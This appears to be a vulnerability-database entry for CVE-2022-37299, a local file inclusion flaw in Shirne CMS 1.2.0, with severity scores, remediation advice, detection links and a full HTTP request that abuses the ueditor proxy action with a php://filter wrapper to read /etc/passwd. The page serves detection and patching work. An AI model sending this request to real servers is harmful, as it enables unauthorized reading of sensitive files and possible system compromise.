🔙 목록으로 돌아가기

CVE-2022-37299: Shirne CMS 1.2.0 - Local File Inclusion

TitleShirne CMS 1.2.0 - Local File Inclusion
Authorpikpikcu
SeverityMedium
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
RemediationUpgrade to the latest version of Shirne CMS or apply the vendor-provided patch to mitigate the LFI vulnerability.
CVSS Score6.5
EPSS Score0.17152
CVE IDCVE-2022-37299
CWE IDCWE-22
Tags cve cve2022 shirnecms lfi shirne_cms_project vkev vuln

🔍 Vulnerability Description

Shirne CMS 1.2.0 is vulnerable to local file inclusion which could cause arbitrary file read via /static/ueditor/php/controller.php.

🌐 HTTP Request

GET /static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-37299.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-37299.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A